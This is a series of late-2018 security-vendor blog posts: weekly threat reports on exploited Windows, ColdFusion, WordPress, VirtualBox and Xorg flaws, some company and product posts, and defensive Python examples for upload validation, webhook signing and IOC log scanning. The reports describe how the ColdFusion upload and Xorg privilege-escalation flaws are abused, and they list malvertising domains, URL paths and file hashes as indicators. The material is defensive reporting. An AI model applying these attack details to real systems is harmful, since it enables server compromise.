One of the vulnerabilities being actively exploited in the wild is a Win32k privilege escalation. CVE-2018-8589 has been found in the wild on Windows 7, Windows Server 2008, and Windows Server 2008 R2 systems. However, an attacker needs to be authenticated to the system to exploit the vulnerability and gain full control. Another critical patch was for CVE-2018-8584, which was disclosed in October and impacts Windows 10, Windows Server 2016, and Windows Server 2019. When exploited it allows unauthorized users to access and delete files on systems that are normally only accessible by admins. This could open the door for DLL hijacking and other attack vectors that would allow for privilege escalation.

Also included were five vulnerabilities in the Chakra scripting engine behind Microsoft Edge (CVE-2018-8551, CVE-2018-8555, CVE-2018-8556, CVE-2018-8557, and CVE-2018-8588). Any of these CVEs could be leveraged to execute code on an Edge user’s host. To be exploited, the Edge user would have to be naively phished or innocently malvertised. Remember, malvertising is on the rise. If an attacker chained together an Edge exploit with either of the vulnerabilities that allow for privilege escalation, they could gain full control of the host.

Other notables included two remote code execution flaws in Word (CVE-2018-8539, CVE-2018-8573) and PowerShell bugs that allow potential remote code execution (CVE-2018-8256, CVE-2018-8415).

Data Privacy Plug-in Ironically Eliminates Privacy for Thousands of Sites

Last week, a privilege escalation vulnerability was disclosed in a popular WordPress GDPR compliance plugin with over 100K installs. This week, thousands of websites have been compromised. If you’re running a WordPress site, check your GDPR plugin for updates, because attackers are scanning everyone. The patched version is 1.4.3.

Although these sites are fully compromised, Sucuri has been tracking one campaign in particular and reports observing thousands of compromised sites that direct the user to code similar to that used to invoke fake tech support scams (TSS). We confirmed with Perchy that the TSS campaign is currently using wtools[.]io to host the injected content and redirecting users to diwutixip[.]innocraft[.]cloud for the TSS payloads.

China Chopper Finds Forever Home with ColdFusion

Security researchers have recently observed active exploitation of a newly patched vulnerability in Adobe ColdFusion. A suspected Chinese APT group was able to compromise a vulnerable ColdFusion server by directly uploading a China Chopper webshell. Adobe’s ColdFusion has historically been a major target of APT groups looking to compromise networks. Modern versions of ColdFusion include the WYSIWYG rich text editor CKEditor. When Adobe decided to replace FCKeditor with CKEditor, they inadvertently introduced an unauthenticated file upload vulnerability. The vulnerability is easily exploited through an HTTP POST request to the file “upload.cfm”, which is not restricted and does not require authentication. It should be noted that ColdFusion does attempt to restrict the file types that are allowed for upload via CKEditor in a configuration file called “settings.cfm”. Researchers have identified that Adobe did not include the “.jsp” file extension in the default configuration, which was problematic because ColdFusion allows “.jsp” files to be actively executed.

The attackers also identified a directory modification issue through the “path” form variable that allowed them to change the directory to where uploaded files would be placed. This means that even if the .jsp file extension had been on the block list, the attackers could have placed another script or executable file somewhere on the system in an attempt to compromise it. All files on the compromised websites were found in one of two directories; /cf_scripts/ and /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/. Several of the affected websites contained an HTML index file from the hacktivist group, “TYPICAL IDIOT SECURITY”.
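Two separate mistakes are described above: a file-type blocklist that simply forgot `.jsp`, and an upload directory taken from a caller-supplied `path` variable. The block below is an added example, not ColdFusion’s or CKEditor’s code, contrasting that blocklist pattern with an allowlist check and confining the destination directory to the upload root. The extension sets and the upload root are constructed for the illustration.

```python
"""Upload validation: blocklist vs. allowlist, and confining the destination path (added example)."""
import posixpath

# Blocklist in the spirit of the text: the executable types someone remembered to deny.
# One omission (.jsp here, as in the ColdFusion case) and the check is worthless.
BLOCKLIST = {".cfm", ".cfc", ".php", ".asp", ".aspx", ".exe"}
# Allowlist: only what a rich-text editor actually needs to upload.
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}
UPLOAD_ROOT = "/var/www/uploadedFiles"  # hypothetical upload directory


def blocklist_allows(filename):
    """The weak check: anything not explicitly denied gets through."""
    _, ext = posixpath.splitext(posixpath.basename(filename).lower())
    return ext not in BLOCKLIST


def allowlist_allows(filename):
    """The hardened check: every suffix of the name must be on the allowlist."""
    parts = posixpath.basename(filename).lower().split(".")
    if len(parts) < 2 or not all(parts):   # no extension, or empty pieces like 'a..png'
        return False
    return all("." + p in ALLOWLIST for p in parts[1:])


def confine_path(user_subdir, root=UPLOAD_ROOT):
    """Resolve a caller-supplied subdirectory under root; None if it would escape."""
    candidate = posixpath.normpath(posixpath.join(root, user_subdir.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def validate_upload(filename, user_subdir):
    """Combined decision: (destination path, 'ok') or (None, reason)."""
    if not allowlist_allows(filename):
        return None, "extension not allowed"
    dest_dir = confine_path(user_subdir)
    if dest_dir is None:
        return None, "path escapes upload root"
    return posixpath.join(dest_dir, posixpath.basename(filename)), "ok"


if __name__ == "__main__":
    print("blocklist lets page.jsp through:", blocklist_allows("page.jsp"))
    print("allowlist lets page.jsp through:", allowlist_allows("page.jsp"))
    print(validate_upload("photo.png", "2018/11"))
    print(validate_upload("photo.png", "../cf_scripts"))
```

Note that the allowlist check walks every suffix, so a name like `photo.jsp.png` is rejected even though its final extension is harmless; and the path check is done on the normalized result, not on the raw string, so `..` components are caught wherever they sit.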

On September 11, 2018, Adobe issued security bulletin APSB18-33, which fixed a variety of issues including an unauthenticated file upload vulnerability. This vulnerability was assigned CVE-2018-15961, affecting ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release). You should apply the patch from Adobe.

We observed potential recon activity from:

JexBoss Gets Wild with NCCIC

Finally, to close out this threat report, we have a tool getting the spotlight from the National Cybersecurity and Communications Integration Center (NCCIC). NCCIC issued a US-CERT alert for a security assessment tool. JexBoss is used to test and exploit older vulnerabilities in Java applications and platforms, including the JBoss AS/WildFly web server framework. The GitHub repo hasn’t been updated in two years, and there are open issues to fix bugs and to add new attacks. It amazes me that older versions of this software are still out there, unpatched and living their best life.

Attackers used JexBoss in the SamSam ransomware campaign that targeted the healthcare industry. According to US-CERT, JexBoss allows an attacker to execute arbitrary OS commands on the target host by installing a webshell, blindly injecting commands, or establishing a reverse shell. NCCIC has determined that JexBoss operates across all seven stages of the Cyber Kill Chain framework. Users and administrators are advised to review AR18-312A from US-CERT.

Thinking in Webhooks

on November 13, 2018

Webhooks have come a long way from a concept first discussed back in 2007, to a commonly used pattern that helps power the apps and services you use daily. We have recently rolled out webhooks for Perch Security, so it seemed fitting to explain what webhooks are, the benefits of using them, and how you can start using webhooks in Perch today.

What are webhooks?

A webhook is an HTTP POST request that is sent to a user-configured URL in response to some event that has occurred. There is no formal definition or specification for webhooks, so implementations vary, but a webhook usually consists of an HTTP request that is triggered by an event and sent to a user-defined URL. Examples of webhook-based products you may already know or use include Zapier and IFTTT.

Benefits of adding webhooks to a service

  • They allow for real-time, event-driven interactions for customers in everything from APIs to apps.
  • Can be used as part of an internal architecture to process events quickly, whereas older architectures may have used a combination of cron jobs and database queries to do batch updates.
  • They allow for simplified architecture – you and your customers can consume the same hooks and act on them differently. Code them once and use them over and over again.
  • Customers are able to integrate and extend your product without needing to do any additional product development.

Using webhooks with Perch

In our efforts to help you and your team *thrunt more effectively, we’ve added (limited) webhook support to Perch. To try it out, head over to the Organization Settings page and select “Webhooks” from the integration section. This iteration includes a webhook that will fire every time an alert is created for your team. As we identify more events that are key to Perch and our customers, we will add more webhooks. We look forward to hearing how our customers use these new webhooks as part of their workflow.

*thrunt (verb) - To hunt cyber security threats - “Jeremy really knows how to thrunt!”
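Because a webhook is just a POST to a URL you hand out, the receiving end has to decide whether a request really came from the service it expects. As an added example (not Perch’s code, and the page does not describe how Perch formats or authenticates its webhook requests), here is an emitter and receiver pair in Python for an “alert created” event, using an HMAC-SHA256 signature over a timestamp and the raw body. The header names, the signing scheme and the five-minute replay window are all assumptions for the example.

```python
import hashlib
import hmac
import json
import time

# Assumed header names and signing scheme for this example; the page does not
# document how Perch authenticates its webhook requests.
SIG_HEADER = "X-Webhook-Signature"
TS_HEADER = "X-Webhook-Timestamp"
MAX_SKEW_SECONDS = 300


def build_alert_event(alert_id, title, severity, created_at):
    """Serialize an 'alert created' event as the raw bytes an emitter would POST."""
    event = {
        "event": "alert.created",
        "alert": {"id": alert_id, "title": title, "severity": severity, "created_at": created_at},
    }
    return json.dumps(event, sort_keys=True, separators=(",", ":")).encode()


def sign(secret, timestamp, body):
    """HMAC-SHA256 over timestamp and raw body, so neither can be swapped independently."""
    msg = str(int(timestamp)).encode() + b"." + body
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def emit(secret, body, now=None):
    """Emitter side: the headers to send alongside the body."""
    ts = int(time.time() if now is None else now)
    return {TS_HEADER: str(ts), SIG_HEADER: sign(secret, ts, body)}


def verify(secret, headers, body, now=None):
    """Receiver side: reject missing or stale timestamps, then compare in constant time."""
    ts_raw = headers.get(TS_HEADER)
    sig = headers.get(SIG_HEADER)
    if ts_raw is None or sig is None:
        return False
    try:
        ts = int(ts_raw)
    except ValueError:
        return False
    current = int(time.time() if now is None else now)
    if abs(current - ts) > MAX_SKEW_SECONDS:
        return False
    return hmac.compare_digest(sign(secret, ts, body), sig)


def handle_webhook(secret, headers, body, now=None):
    """Verify first, then parse. Returns the event dict, or None if rejected."""
    if not verify(secret, headers, body, now):
        return None
    return json.loads(body.decode())
```

Two details worth copying: sign the raw bytes you received, not a re-serialized version of the parsed JSON (whitespace differences would break the check), and compare with hmac.compare_digest rather than == so the comparison time does not leak how many leading characters matched.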

IT Nation 2018 drills into managed security opportunity

November 12, 2018

At the IT Nation 2018 conference, ConnectWise CEO Arnie Bellini bid attendees to embrace the fast-growing managed security market and abandon their generalist approaches.

Read the full article here.

Threat Report Thursday November 8th 2018

on November 8, 2018

In this week’s threat report we’re covering a couple 0-days, malware that could have you scrambling for your disaster recovery (DR) plan, and the rising trend of malvertising. Let’s get it goin’.

Full Disclosure for VirtualBox 0-Day

Speaking of 0-days, security researcher Sergey Zelenyuk has publicly disclosed a 0-day in the virtual machine software VirtualBox without notifying Oracle, the developer of the free application. The flaw relies on a chain of bugs and can allow malicious code to escape the VirtualBox environment (guest) and execute on the underlying (host) operating system. Zelenyuk highlights that attackers can then use many of the already known privilege escalation bugs to gain kernel-level access (ring 0) on the host. The flaw affects VirtualBox 5.2.20 and prior versions and impacts any host OS or guest OS with a VM in the default network configuration. Zelenyuk has published a video demonstrating the attack as well as a detailed technical write-up on GitHub.

No patches are currently available. In the meantime, Zelenyuk advises users to change the network card of their virtual machines to either PCnet or Paravirtualized Network (virtio). If this cannot be done, users should change the adapter mode from NAT to another one. The first option is more secure, he adds.
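If you run more than a couple of VMs, checking each one by hand for the default Intel adapter in NAT mode gets old fast. Here is an added Python check (example code for this post, not from the researcher or from Oracle) that parses the output of VBoxManage showvminfo <vm> --machinereadable and reports adapters in the exposed configuration. The key names nicN and nictypeN and the adapter identifiers are what that command prints on the versions I have used, but treat them as assumptions and confirm against your own output.

```python
import re

# Adapter types as reported by "VBoxManage showvminfo <vm> --machinereadable"
# (assumed key names: nicN="nat", nictypeN="82540EM"). The Intel PRO/1000 family
# is the default; PCnet and virtio are the alternatives the researcher recommends.
INTEL_E1000 = {"82540EM", "82543GC", "82545EM"}
RECOMMENDED = {"Am79C970A", "Am79C973", "virtio"}
LAST_AFFECTED = (5, 2, 20)  # 5.2.20 and prior, per the disclosure


def parse_machinereadable(text):
    """Turn key="value" lines into a dict; quoted or unquoted values both accepted."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r'^([A-Za-z0-9_]+)="?(.*?)"?$', line.strip())
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def version_affected(version):
    """True for 5.2.20 and earlier."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts <= LAST_AFFECTED


def exposed_nics(cfg):
    """Adapters in NAT mode with an Intel card: the configuration the escape needs."""
    findings = []
    for key, mode in cfg.items():
        m = re.fullmatch(r"nic(\d+)", key)
        if not m or mode in ("none", "null"):
            continue
        idx = m.group(1)
        nictype = cfg.get("nictype" + idx, "")
        if mode == "nat" and nictype in INTEL_E1000:
            findings.append((int(idx), nictype))
    return sorted(findings)


def advice(cfg, version):
    """One line of remediation per exposed adapter; empty if the build is not affected."""
    if not version_affected(version):
        return []
    return [
        "nic%d (%s): switch nictype%d to one of %s, or move it off NAT"
        % (i, t, i, sorted(RECOMMENDED))
        for i, t in exposed_nics(cfg)
    ]


# Constructed sample output (not a real VM) with one exposed adapter.
SAMPLE = """name="win10-test"
memory=2048
nic1="nat"
nictype1="82540EM"
cableconnected1="on"
nic2="hostonly"
nictype2="virtio"
nic3="none"
"""
```

Feed it the real output with something like subprocess.run(["VBoxManage", "showvminfo", name, "--machinereadable"], capture_output=True, text=True).stdout, and loop over VBoxManage list vms to cover every VM on the host.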

Zelenyuk shared that his reasoning for publishing the 0-day without notifying Oracle first stemmed from personal frustration at how long it takes for patches to be produced and implemented, as well as issues submitting flaws to bug bounty programs. If Zelenyuk has found this, then chances are someone else has too and we are more secure by knowing about this vulnerability than by being unaware of it. Thanks, Zelenyuk. Very pragmatic.

Crypto-jacking Malware forces 3-Day St. Francis Xavier University Network Outage

According to a statement released on November 4, 2018, St. Francis Xavier University in Nova Scotia, Canada was forced to shut down its entire network for at least three days as system administrators attempted to root out crypto-jacking (cryptocurrency mining) malware. The attack reportedly began on Thursday, November 1, and targeted the university’s network infrastructure. After the malware was detected, the school immediately shut down its entire network, disabling all online systems including online courses, cloud storage, email services, debit transactions, and Wi-Fi. The statement reads, “The malicious software attempted to utilize StFX’s collective computing power in order to create or discover Bitcoin for monetary gain.” The statement emphasized that there is no evidence to indicate that personal or sensitive data was compromised by the malware attack. That no sensitive data was compromised is down to luck rather than defences: crypto-mining malware does not typically try to exfiltrate data. Had they been infected with malware that sought to exfiltrate sensitive data, we would be looking at a data breach here instead of an outage. University officials advised all students, staff, and faculty to reset their university account passwords as a precaution; the university should have forced a password reset instead.

Disk Cryptor Leveraged by Ransomware Campaign

Another type of malware that could send you into full-on DR is ransomware. MalwareHunterTeam has recently discovered new ransomware that installs Disk Cryptor to encrypt victim machines. Disk Cryptor is a legitimate full-disk encryption program that encrypts the whole disk and then prompts the user for a password at boot. According to MalwareHunterTeam, this ransomware requires a password argument to be passed on the command line; that argument is the decryption key, so it is likely the attackers are breaking into Remote Desktop Services and installing the ransomware manually. During the installation process, a log file is created at C:\Users\Public\myLog.txt that shows the current stage of the encryption process. Once the entire drive has been encrypted, the computer reboots and victims are greeted with a ransom note telling them to contact mcrypt2018@yandex.com for payment instructions. It is essential that you have reliable and tested backups that can be restored in an emergency such as a ransomware attack. There is a very narrow window to catch ransomware before it encrypts the disk. If this really is coming in through Remote Desktop Services, it’s far more likely to be a weak password than a 0-day. But please question whether you need RDP open to the world.

Related Registry Keys

Related file hashes (MD5, SHA256):

- 4ae71336e44bf9bf79d2752e234818a5
- f1d81ae5a4ea7a71d5d7147565fecca141a8e03148ef3c9e7583b9159923d17a

Rising Malvertising Opens Gateway for 0-Days

Based on the ad-related traffic before this activity, we believe this is likely malvertising. Malvertising is the common ground where evil marketing teams and hungry blackhats meet to perform ritual sacrifice on end users. No matter how well you train staff, if they are allowed on the Web, they will get ads. Ads are ubiquitous on the Internet. We are all at risk when adversaries can replace a benign, normal, soul-sucking ad with a malicious one. We’ve been watching a large number of our customers’ users getting pop-ups for fake tech support scams that go like, “You have been infected with Pornographic Malware, please call the number on the screen or we will report you to the police.” We aren’t sure who picked up the phone and called, but we wanted to let everyone know so they can block the sources of the activity. We’re seeing this campaign across approximately 15 percent of our customer base and it does not appear to target one industry more than another. This is just a fake tech support scam. Imagine if an attacker used malvertising to distribute a new Edge 0-day instead.

Researchers recently discovered a 0-day remote code execution (RCE) vulnerability in Microsoft Edge. In a tweet posted November 1, 2018, exploit developer Yushi Liang wrote, “we just broke #Edge, teaming up with [Alexandr Kochkov] for a stable exploit, brace yourself SBX is coming.” The tweet included an image of the browser launching the Windows Calculator app. Liang and Kochkov’s objective was to develop a stable exploit and achieve a full sandbox escape. The pair disclosed that they were also looking for a method to escalate privileges to SYSTEM, which would grant complete control over the victim machine. Liang shared that he discovered the 0-day with the assistance of the Wadi Fuzzer utility from SensePost. The pair plans to publish a proof-of-concept demonstrating the vulnerability soon. We’ll let you know when they do.

Until then, here are some domains to block. If you want the IPs, hit me up on Slack. To see if your users got hit by this malvertising campaign, check Perchybana for HTTP requests over the last 30 days whose URL contains “/tpage3/” or “/welcome/?a=”; the fields worth pulling into the view are the source and destination addresses and ports, http.hostname, http.url, http.http_refer, http.status, and the fileinfo filename and SHA1.


Hosting organizations for the blocked IPs (IPs withheld):

- DigitalOcean, LLC (DO-13)
- DigitalOcean, LLC (DO-13)
- DigitalOcean, LLC (DO-13)
- DigitalOcean, LLC (DO-13)
- DigitalOcean, LLC (DO-13)
- Centrilogic, Inc. (CENTR-60)
- DigitalOcean, LLC (DO-13)
- DigitalOcean, LLC (DO-13)
- US-DIGITALOCEANLLC-20100303
- UK-MASSIVEGRID-20131231
- Hostwinds LLC. (HL-29)
- Jack Henry & Associates, Inc. (JHA-1)
- PSINet, Inc. (PSI)
- PSINet, Inc. (PSI)
- PSINet, Inc. (PSI)
- NOC4Hosts Inc. (NOC4H)
- NOC4Hosts Inc. (NOC4H)


- /fonts/glyphicons-halflings-regular.ttf
- /fonts/glyphicons-halflings-regular.woff
- /fonts/glyphicons-halflings-regulard41d-.eot
- /tpage3/a.htm
- /tpage3/gb.mp3
- /tpage3/iframe.js
- /tpage3/jquery-1.js
- /tpage3/login.php
- /tpage3/retreaver.js
- /welcome/?a=AZ&pagex=1&s1=[campaign id]%2C%2C&os=[operating system]&browser=[browser name]&isp=[internetservice provider]&ip=[public ip]&geo=[geo ip code]&q1=[string]%2C
- /tpage3/?a=AZ&pagex=1&s1=[campaign id]%2C%2C&os=[operating system]&browser=[browser name]&isp=[internetservice provider]&ip=[public ip]&geo=[geo ip code]&q1=[string]%2C


- 69db1a94309e88008bbadacf301526edce59374410c83f888ec866ad6b2d8e47 - iframe.js
- 71a861100e206eeee88876cd5313553e0fdc07046cce33a1a96b96d9485070e1 - retreaver.js


- ganglioblast[.]pw
- gathering[.]pw
- gaultherin[.]pw
- glycolysis[.]pw
- haematoscope[.]pw
- haemoglobin[.]pw
- hemizygote[.]pw
- hemocyanin[.]pw
- hidradenomas[.]pw
- hologamies[.]pw
- holographies[.]pw
- homeopathies[.]pw
- homoeotic[.]pw
- homogeneous[.]pw
- homogeniser[.]pw
- homolytic[.]pw
- junaket[.]us
- kremlins[.]pw
- laudably[.]pw
- leafless[.]pw
- mannikin[.]pw
- massaged[.]pw
- metamers[.]pw
- ministrytwo[.]stream
- minusnine[.]stream
- misatone[.]pw
- misbills[.]pw
- misdeeds[.]pw
- misdoing[.]pw
- misdraws[.]pw
- misjoins[.]pw
- mislearn[.]pw
- misspent[.]pw
- mistrust[.]pw
- miterers[.]pw
- modified[.]pw
- monazite[.]pw
- monitive[.]pw
- monotony[.]pw
- mustered[.]pw
- mutating[.]pw
- muteness[.]pw
- nailfold[.]pw
- news[.]hellosite[.]info
- sp[.]cwfservice[.]net
- swiftone[.]us
- tellinglynine[.]us
- torousten[.]pw
- trivetnine[.]pw
- turgitefour[.]pw
- unearthsix[.]pw
- unkindnine[.]pw
- unlockten[.]pw
- unmetsix[.]pw
- unplaittwo[.]pw
- unplugfive[.]pw
- unresttwo[.]pw
- unretireten[.]pw
- untunedone[.]pw
- upraiseten[.]pw
- usheredfour[.]pw
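For anyone without Perchybana, the same hunt can be run over your own proxy or IDS HTTP logs. The Python below is an added example for this post (not Perch’s detection code): it refangs a subset of the domains listed above, matches hostnames exactly or as subdomains, flags the two landing-page path patterns the search keyed on, and pulls the s1 campaign id out of the query string. The domain subset is deliberately partial to show that the path rule still catches a landing page on a host that is not on the list yet. The sample records are constructed, not customer data.

```python
from urllib.parse import parse_qs, urlsplit

# A subset of the blocked domains above, in the defanged form they were published.
IOC_DOMAINS_DEFANGED = [
    "ganglioblast[.]pw",
    "ministrytwo[.]stream",
    "news[.]hellosite[.]info",
    "sp[.]cwfservice[.]net",
]
# The URL patterns the Perchybana search keyed on.
PATH_PREFIXES = ("/tpage3/", "/welcome/?a=")


def refang(domain):
    return domain.replace("[.]", ".").lower()


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}


def host_matches(hostname):
    """Exact or subdomain match against the IOC list."""
    host = hostname.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def campaign_id(url):
    """Pull the s1 campaign id out of the landing-page query string, if present."""
    qs = parse_qs(urlsplit(url).query)
    return qs.get("s1", [None])[0]


def classify(record):
    """record: dict with src_ip, hostname, url (path plus query, as the IDS logs it).
    Returns the list of reasons it matched; an empty list means clean."""
    reasons = []
    if host_matches(record["hostname"]):
        reasons.append("ioc-domain")
    if record["url"].startswith(PATH_PREFIXES):
        reasons.append("tech-support-landing-path")
    return reasons


def scan(records):
    """(src_ip, hostname, reasons, campaign id) for every matching record."""
    hits = []
    for r in records:
        reasons = classify(r)
        if reasons:
            hits.append((r["src_ip"], r["hostname"], reasons, campaign_id(r["url"])))
    return hits


# Constructed sample records for the example (not real customer data).
SAMPLE_RECORDS = [
    {"src_ip": "10.1.1.20", "hostname": "misdeeds.pw",
     "url": "/welcome/?a=AZ&pagex=1&s1=4471%2C%2C&os=Windows&browser=Edge"},
    {"src_ip": "10.1.1.21", "hostname": "ganglioblast.pw", "url": "/tpage3/iframe.js"},
    {"src_ip": "10.1.1.22", "hostname": "cdn.news.hellosite.info",
     "url": "/fonts/glyphicons-halflings-regular.woff"},
    {"src_ip": "10.1.1.23", "hostname": "www.example.com", "url": "/welcome/index.html"},
]
```

The campaign id is worth keeping: when the same s1 value shows up across several customers it tells you the pop-ups came from one ad campaign rather than a coincidence, which is exactly the kind of evidence that gets an ad network to act.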

A Day in the Life: Sales at Perch Security

on November 6, 2018

They say, “time flies when you’re having fun”. This couldn’t ring more true as I look back on my time here at Perch Security. The day before Halloween was my first day on the job. It just so happened to be costume day here in the office. Words in this blog post do no justice to what my eyes saw that day. I knew right then, I made a great choice by joining this company.

Trekking through the cybersecurity sales landscape

Working sales in the #cybersecurity space can prove to be cumbersome. There can be confusion amongst customers regarding the various products in the market. Customers may think they are protected but may not be using the right setup for their #security stack. One layer of security that proved to be efficient years back may now be outdated, and therefore useless today. The sales rep must be ‘in the know’ and educate the potential consumer on market trends and best practices. This is why Perch Security was built; to stay true to what we see and hear in the industry. We offer a user-friendly service to the masses. I like to call it a “peace of mind” service. I’ll explain.

Perch Security automates the threat feeds you subscribe to. However, we do not stop there. We take it a step further: Perch offers around-the-clock, highly trained security analysts to threat hunt for you, ultimately freeing up your day to focus elsewhere. I think our approach is why we are seeing so much success. Not to mention, we do it at such an affordable cost that it makes my job selling a heck of a lot easier!

Keep your eyes on the prize

It goes without saying that there is never a dull day here at Perch Security. Make sure to stay tuned for future product enhancements. We are constantly taking the feedback from our customers and building on what we hear. With the ever-changing cybersecurity market, you must think ahead. The issues you are facing today may not be what comes at you tomorrow.

As we continue to pick up speed and expand in the market place, I’ll have to stop and think to myself about how we got here, where we are at, and where we are headed. Sometimes it’s the journey that teaches you a lot about your destination.

Release Notes

November 2, 2018

  • Comments: Default to private for new comments
  • Communities: Intel471 added
  • Integrations: ConnectWise MVP integration
  • Support: Convert LinkHigh to MSSP

  • Deps: Resolve failing builds for foundation-emails dependencies
  • Performance: Disable map sightings endpoint to conserve data and time

  • ConnectWise MVP integration demoed and deployed to QA
  • Intel471 community added to PROD
  • All new indicator comments are private by default

Threat Report Wednesday October 31st 2018

on October 31, 2018

It’s time to rise from your graves for our Halloween threat report. This week we’re going to point you at a few Twitter doors to knock on, hand out some zero-day tricks and treats, and discuss a white paper that’s giving energy and water a fright.

Zero-Day Tricks and Treats

Many security professionals get their news through sources like Twitter. If you’re looking for some Twitter doors to knock on to get the good treats this Halloween, check out @SandboxEscaper and @HackerFantastic.

In recent months, security researcher @SandboxEscaper has released proof-of-concept (PoC) exploits for two Windows zero-days on Twitter. The most recent vulnerability is a privilege escalation flaw in the Microsoft Data Sharing Service (dssvc.dll). The Data Sharing Service runs as the LocalSystem account and provides data brokering between applications. @SandboxEscaper’s zero-days have been picked up by threat actors and seen in the wild. If you want some early warning on the next Windows zero-day, give her a follow.

On the Linux side of the world, security researcher Narendra Shinde discovered a local privilege-escalation and file-overwrite vulnerability in X.Org X server that opens the door for a trivial compromise of a Linux system.

Essentially, Shinde says this is the result of “incorrect command-line parameter validation”. The server doesn’t check that the caller is allowed to use the files named by the -modulepath or -logfile command-line switches, and because Xorg runs with root privileges (it is installed setuid root on many distributions), both switches operate as root.

Although this was only given a CVSS score of 6.6 (likely because it was considered a local exploit), security pro @HackerFantastic has released a PoC on Twitter that shows this working over a remote SSH session. This makes CVE-2018-14665 a dime in my little black book.

“Xorg Local Privilege Escalation (LPE) via CVE-2018-14665 can be triggered from a remote SSH session, does not need to be on a local console. An attacker can literally take over impacted systems with three commands or less”. @HackerFantastic regularly posts PoCs and other good security news. You should give him a follow too.

Spectre of Spectre Returns to Haunt Halloween

Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) have reported an industry-wide issue in the way many modern microprocessor designs implement speculative execution of load and store instructions (a commonly used performance optimization), known as Speculative Store Bypass (CVE-2018-3639). The vulnerability relies on the presence of a precisely defined instruction sequence in privileged code, together with the fact that a memory read from an address to which a recent memory write has occurred may speculatively see the older value. That speculative read updates the microprocessor’s data cache even when the speculatively executed instructions never commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory through a targeted cache side-channel attack. This impacts the qemu-kvm and libvirt packages.

Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.

The libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems.

This reminded us of the OG speculative execution vulnerability, Spectre, disclosed by Jann Horn and Paul Kocher in collaboration with Daniel Genkin, Mike Hamburg, Moritz Lipp and Yuval Yarom.

Water and Energy Industrial Controls Exposed on the Web

Trend Micro has recently published a white paper on water and energy infrastructure exposed to the Internet, and it’s worth a read. Trend Micro reports that Energy is the top critical infrastructure for most industrial economies and Water is a natural extension of the energy sector; with water being a key component in hydroelectric and geothermal plants. Protecting critical infrastructure against cyber attacks should be of the highest priority for the organizations that operate it.

Perch provides threat detection services to a number of critical infrastructure providers in the water and energy space, so we looked for the exposed services mentioned in the white paper. After reviewing all customer data for the last 30 days, we found no established flows from the open Internet to ports associated with industrial control systems. Good job, Perchy people. You get a treat.

The New Era of Service

on October 30, 2018

Adapting to new work environments is never easy, especially to one that’s always in flux: Technology. As a newbie to the biz, one of the first things I learned to appreciate was how focused the market was on succeeding. Not only in terms of financials but recognizing that the victory of any SaaS stems from one quintessential metric – the success story of their clients.

What Makes Customer Success Special?

The Customer Success Department (CS) of any company is a relatively new creation and has quickly proven to be essential for start-ups. If end-users only see ROI and feel they aren’t supported, why would they stay? The answer is: by the time you’ve thought of this, they are gone; with or without warning. Facts are facts. The current year 2018 (err 19) is light years past the glory days when big business smoked stogies and chugged bourbon mid-day barking demands and convincing clients they ‘needed’ them based solely on their brassy conviction. We talk. We post. We share information in real-time. Everything is public and it’s far past time customers are given the respect their hard-earned money deserves. It’s time to say “Goodbye” to the Salesman and say “Yassss” to the #SuccessMan.

As a SaaS we recognized early on that the sustainability of our company derives from our clients’ satisfaction. In the realm of cybersecurity there are no Amazon Reviews, but our segment is so tight and niche that there isn’t a need. Sentiments travel faster than I’m frantically typing this blog minutes before it’s being posted. Literally Friday afternoon – going live at five (Don’t mind tha typos’).

The Who’s Who of Customer Success

Gary Dobkin, Director of Operations at Perch Security, not only recognized the importance of client satisfaction, he sought out the best route to attain it. Being the self-aware savant that he is, Mr. Dobkin knew he needed the big guns. Enter Onboarding and Provisioning directly under the care of CS, a unique twist that he guarantees to be the ride of a life time.

Once a prospective client passes through the Heavenly Gates into Flock life, the Perch Security team works tirelessly to make sure any question, comment, concern, or squawk does not go unaddressed. Placing our clients at the forefront of our business has proven itself to be one of our many unique characteristics, as is our Marketing and secret obsession with the 8th Wonder of the World – Skyline Chili. Open communication and customized care regimens fuel the CS Department (as does sugar free Red Bull, Kombucha, and pork rinds).

What does all of this even mean?

The moral of this rant is not to boast. It’s not to prove I can form complete sentences, fragments, or make you laugh. It’s merely to convey the passion I have witnessed and have organically become one with. Perch Security provides so much more than a secure network. Our clients (comrades) can trust in the support of our army made of real-life angry birds. Everyone that works here makes up our CS Department and we all want the best for you, your coworkers, your employees, and most importantly YOUR end user – your clients.

It’s time to say “Goodbye” to crossing your fingers and hoping for the best. Facebook, British Airways, and LinkedIn didn’t expect a breach, but it happens. We are committed to your security and want to take the burden of a breach off your shoulders. Perch Security is bright eyed, and bushy tailed 7 days a week, 24 hours a day, 365 days a year so you don’t have to be. Your peace of mind is what we give a FLOCK about.

Threat Report Thursday October 25th 2018

on October 25, 2018

As we approach Halloween, it has been a frightening week in security. We have an ancient Zero-Day rising from the shadows, government data being sucked dry by a data breach, and monstrous malware kidnapping your codes. Don’t get spooked!

Cashdollar Hits Jackpot with Discovery of 8-year-old Zero-Day

Larry Cashdollar, a security researcher from Akamai SIRT, has discovered a zero-day vulnerability in the jQuery File Upload plugin (CVE-2018-9206). This vulnerability enables attackers to upload malicious files, such as rootkits, backdoors, and other malware, to servers. Based on Cashdollar’s research, the vulnerability has been exploited since before 2016: a YouTube video dating back to August 2015 walks through exploiting the bug, suggesting that attackers have been widely exploiting it for years.

